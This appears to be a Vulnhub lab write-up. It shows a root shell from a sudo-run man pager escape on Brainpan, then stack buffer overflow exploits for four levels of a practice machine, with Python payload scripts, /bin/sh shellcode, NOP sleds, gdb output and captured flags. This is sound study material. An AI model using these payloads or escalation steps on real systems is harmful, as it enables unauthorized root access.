[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

Checking exploitdb for Ubuntu 12.10: the only kernel exploit available targets 64-bit platforms, and this box is 32-bit.

OK, so let's focus on that anansi_util binary:

sudo /home/anansi/bin/anansi_util $(python -c "print 'B'*3000")
'unknown': unknown terminal type.

Hmm, it doesn't seem to be vulnerable to a simple overflow of its argument; it just hands the argument on to something that wants a terminal.

Let's go back to the menu... one of the options, manual, takes a command name:

sudo /home/anansi/bin/anansi_util manual whoami
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
WHOAMI(1) User Commands WHOAMI(1)

NAME
whoami – print effective userid

SYNOPSIS
whoami [OPTION]…

DESCRIPTION
Print the user name associated with the current effective user ID.
Same as id -un.

OK, so the manual option runs man! According to GTFOBins (https://gtfobins.github.io/gtfobins/man/), man hands the page to a pager, and from the pager !/bin/sh spawns a shell. Here man is started by anansi_util, which sudo runs as root, so that NOPASSWD rule is effectively a root shell.

BINGO!

puck@brainpan:/bin$ sudo /home/anansi/bin/anansi_util manual man man
!/bin/sh
sudo /home/anansi/bin/anansi_util manual man man
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
!/bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

cd /root
# ll
ll
total 40
drwx—— 5 root root 4096 Mar 7 2013 .
drwxr-xr-x 22 root root 4096 Mar 4 2013 ..
drwx—— 2 root root 4096 Mar 4 2013 .aptitude
-rw——- 1 root root 0 Mar 7 2013 .bash_history
-rw-r–r– 1 root root 3106 Jul 3 2012 .bashrc
-rw-r–r– 1 root root 564 Mar 7 2013 b.txt
drwx—— 2 root root 4096 Mar 4 2013 .cache
-rw——- 1 root root 39 Mar 5 2013 .lesshst
-rw-r–r– 1 root root 140 Jul 3 2012 .profile
-rw-r–r– 1 root root 74 Mar 5 2013 .selected_editor
drwx—— 2 root root 4096 Mar 4 2013 .ssh
# cat b.txt
cat b.txt
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

http://www.techorganic.com

Stack Overflow

A fun machine to practice buffer overflows... Downloaded from Vulnhub.

 

Hi hi hi.. Funny.. it’s a Kali box!!!!

So let’s start….

Level 1:

After logging in I found a binary and its source.

In the source code I found:
if(key == 0x42424242) {
    execve("/bin/sh", 0, 0);

0x42 is 'B' in ASCII, so key has to become BBBB. key sits right after the 32-byte buffer on the stack and the copy of argv[1] into that buffer is not bounded, so 32 bytes fill the buffer and the next 4 spill into key. The terminator the copy appends lands in key too, which is why 34 and 35 Bs leave a 00 byte in it (0x12004242 and 0x00424242, low bytes first since x86 is little-endian) and only exactly 36 Bs give 0x42424242.

So trying to input some Bs:

level0@kali:~$ ./levelOne $(python -c "print 'B'*34")
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x12004242
Sorry try again...
level0@kali:~$ ./levelOne $(python -c "print 'B'*35")
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x00424242
Sorry try again...
level0@kali:~$ ./levelOne $(python -c "print 'B'*36")
Buf is: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Key is: 0x42424242
$ id
uid=1001(level1) gid=1000(level0) groups=1000(level0)
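Why 34 and 35 Bs give 0x12004242 and 0x00424242 is worth seeing byte by byte. The block below is an added example, not the machine's source: it models the levelOne frame as a 32-byte buffer immediately followed by the 4-byte key (that adjacency is what the outputs above show), fills it the way an unbounded C string copy of argv[1] would, terminator included, and reads key back little-endian. The untouched value of key is not shown in the write-up; 0x12345678 is an assumption whose top byte 0x12 matches the 0x12004242 output.

```python
import struct

# Added example, not the level's source code.  Python 3.

BUF_SIZE = 32
KEY_SIZE = 4
ORIGINAL_KEY = 0x12345678   # assumption: only the top byte 0x12 is visible in the output above


def frame_after_copy(arg):
    """Model char buf[32] followed by int key after an unbounded copy of argv[1].

    The copy writes len(arg) bytes plus one NUL terminator starting at buf[0];
    anything beyond the end of buf spills into key.  A few extra bytes past key
    stand in for the rest of the frame so the terminator has somewhere to land
    when key is filled exactly.
    """
    frame = bytearray(BUF_SIZE + KEY_SIZE + 4)
    frame[BUF_SIZE:BUF_SIZE + KEY_SIZE] = struct.pack("<I", ORIGINAL_KEY)
    src = bytes(arg) + b"\x00"           # a C string copy includes the terminator
    if len(src) > len(frame):
        raise ValueError("input overruns the modelled frame")
    frame[:len(src)] = src
    return bytes(frame)


def key_after_copy(arg):
    """The int the program compares against 0x42424242, read little-endian."""
    key_bytes = frame_after_copy(arg)[BUF_SIZE:BUF_SIZE + KEY_SIZE]
    return struct.unpack("<I", key_bytes)[0]


def shell_spawned(arg):
    """True when the overwritten key would take the execve("/bin/sh") branch."""
    return key_after_copy(arg) == 0x42424242


if __name__ == "__main__":
    for n in (32, 33, 34, 35, 36):
        print(n, hex(key_after_copy(b"B" * n)), shell_spawned(b"B" * n))
```

Run it and the 34, 35 and 36 rows reproduce the three "Key is:" lines above; the 32 and 33 rows show the terminator alone already clobbering the low byte of key, which is the classic off-by-one sign that the buffer and key are adjacent.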

LEVEL2:

$ alias ll="ls -al"
$ ll
total 56
drwx—— 2 level1 level1 4096 Jun 16 12:14 .
drwxr-xr-x 8 root root 4096 Jun 8 10:16 ..
-rw-r–r– 1 level1 level1 220 Feb 22 12:13 .bash_logout
-rw-r–r– 1 level1 level1 3391 Feb 22 12:13 .bashrc
-rw-r–r– 1 level1 level1 3526 Feb 22 12:13 .bashrc.original
-rw-r–r– 1 level1 level1 51 Feb 25 13:39 .gdbinit
-rw-r–r– 1 level1 level1 807 Feb 22 12:13 .profile
-rw——- 1 level1 level1 979 Feb 22 12:42 .viminfo
-rw-r–r– 1 level1 level1 161 Feb 22 12:17 .vimrc
-r–r—– 1 level1 level1 33 Feb 22 12:16 level1.txt
-rwsr-sr-x 1 level2 level2 15688 Jun 8 13:43 levelTwo
$ cat level1.txt
a1e7076bbd600f4dccbc38aabcb12897

The levelTwo binary takes an argument:

$ bash
level1@kali:/home/level1$ ./levelTwo aaa
Hello aaa

And crashes with 32 bytes:

level1@kali:/home/level1$ ./levelTwo $(python -c "print 'B'*32")
Hello BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

Let's find where it's crashing then, with a 100-byte cyclic pattern:

./pattern_create.rb -l 100

root@kali:~/boxes/stackoverflows# gdb levelTwo
GNU gdb (Debian 8.2.1-2+b1) 8.2.1
[... licence banner trimmed ...]
Reading symbols from levelTwo...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/boxes/stackoverflows/levelTwo Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Hello Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x41326241 in ?? ()

(gdb) info frame
Stack level 0, frame at 0xffffdd34:
eip = 0x41326241; saved eip = 0x62413362
called by frame at 0xffffdd38
Arglist at 0xffffdd2c, args:
Locals at 0xffffdd2c, Previous frame’s sp is 0xffffdd34
Saved registers:
eip at 0xffffdd30

/usr/bin/msf-pattern_offset -q 41326241
[*] Exact match at offset 36

Exploit. gdb says the saved EIP sits at 0xffffdd30 and the frame ends at 0xffffdd34, so returning to 0xffffdd34 lands on the first byte after our overwritten return address, which is exactly where the NOP sled starts. This only works because ASLR is off on the box; the 1000 NOPs absorb the small stack shifts between running under gdb and running normally:

level1@kali:/home/level1$ cat test.py
import struct
pad = "\x41" * 36                     # offset to the saved return address
EIP = struct.pack("I", 0xffffdd34)    # frame address from gdb = start of our NOP sled
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
NOP = "\x90" * 1000
print pad + EIP + NOP + shellcode

level1@kali:/home/level1$ ./levelTwo $(python test.py)
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1002(level2) gid=1000(level0) groups=1000(level0)

cat level2.txt
c1a0794b6b8e4ad053e0263cfce223a4

LEVEL 3:

level2@kali:/home/level2$ ll
total 56
drwx—— 2 level2 level2 4096 Jun 16 12:15 .
drwxr-xr-x 8 root root 4096 Jun 8 10:16 ..
-rw-r–r– 1 level2 level2 220 Feb 22 12:13 .bash_logout
-rw-r–r– 1 level2 level2 3391 Feb 22 12:13 .bashrc
-rw-r–r– 1 level2 level2 3526 Feb 22 12:13 .bashrc.original
-rw-r–r– 1 level2 level2 29 Feb 22 12:18 .gdbinit
-rw-r–r– 1 level2 level2 807 Feb 22 12:13 .profile
-rw——- 1 level2 level2 895 Feb 22 12:48 .viminfo
-rw-r–r– 1 level2 level2 161 Feb 22 12:18 .vimrc
-r–r—– 1 level2 level2 33 Feb 22 12:18 level2.txt
-rwsr-sr-x 1 level3 level3 15596 Jun 8 13:44 levelThree

level2@kali:/home/level2$ file levelThree
levelThree: setuid, setgid ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6a53242578c17f973d1f37148b2cb2251c2103f6, not stripped

./levelThree $(python -c "print 'B'*1000")
Buf: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

level2@kali:/home/level2$ /usr/bin/msf-pattern_create -l 1000
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Then run in GDB:
level2@kali:/home/level2$ gdb -q levelThree
Reading symbols from levelThree…(no debugging symbols found)…done.
warning: File “/home/level2/.gdbinit” auto-loading has been declined by your `auto-load safe-path’ set to “$debugdir:$datadir/auto-load”.
To enable execution of this file add
add-auto-load-safe-path /home/level2/.gdbinit
line to your configuration file “$HOME/.gdbinit”.
To completely disable this security protection add
set auto-load safe-path /
line to your configuration file “$HOME/.gdbinit”.
For more information about this security protection see the
“Auto-loading safe path” section in the GDB manual. E.g., run from the shell:
info “(gdb)Auto-loading safe path”
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /home/level2/levelThree Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Buf: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()

(gdb) info frame
Stack level 0, frame at 0xffffd9b4:
eip = 0x6a413969; saved eip = 0x316a4130
called by frame at 0xffffd9b8
Arglist at 0xffffd9ac, args:
Locals at 0xffffd9ac, Previous frame’s sp is 0xffffd9b4
Saved registers:
eip at 0xffffd9b0

level2@kali:/home/level2$ /usr/bin/msf-pattern_offset -q 6a413969
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
[*] Exact match at offset 268

Creating the exploit, same recipe with the new offset and frame address:

import struct
pad = "\x41" * 268                    # offset to the saved return address
EIP = struct.pack("I", 0xffffd9b4)    # frame address from gdb = start of the NOP sled
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
NOP = "\x90" * 1000
print pad + EIP + NOP + shellcode

level2@kali:/home/level2$ ./levelThree $(python test.py)
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1003(level3) gid=1000(level0) groups=1000(level0)

cat level3.txt
c303c0eaeb5f1afcc300a5cecf541083

LEVEL4:

./levelFour ss
Buf: ss

./levelFour $(python -c "print 'B'*1000")
Buf: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Segmentation fault

In GDB, after running it with the same 1000-byte pattern:

Program received signal SIGSEGV, Segmentation fault.
0x62413961 in ?? ()

(gdb) info frame
Stack level 0, frame at 0xffffd9b4:
eip = 0x62413961; saved eip = 0x31624130
called by frame at 0xffffd9b8
Arglist at 0xffffd9ac, args:
Locals at 0xffffd9ac, Previous frame’s sp is 0xffffd9b4
Saved registers:
eip at 0xffffd9b0

level3@kali:/home/level3$ /usr/bin/msf-pattern_offset -q 62413961
Rails Error: Unable to access log file. Please ensure that /home/level0/.msf4/logs/production.log exists and is writable (ie, make it writable for user and group: chmod 0664 /home/level0/.msf4/logs/production.log). The log level has been raised to WARN and the output directed to STDERR until the problem is fixed.
[*] Exact match at offset 28

Creating the exploit:

import struct
pad = "\x41" * 28                     # offset to the saved return address
EIP = struct.pack("I", 0xffffd9b4)    # frame address from gdb = start of the NOP sled
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
NOP = "\x90" * 1000
print pad + EIP + NOP + shellcode

level3@kali:/home/level3$ ./levelFour $(python test.py)
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1۰̀Sh/ttyh/dev��1�f�’�̀1�Ph//shh/bin��PS�ᙰ

$ id
uid=1004(level4) gid=1000(level0) groups=1000(level0)

cat level4.txt
f633cbb8f6a7ca2e0ac216b1dc2ad57a
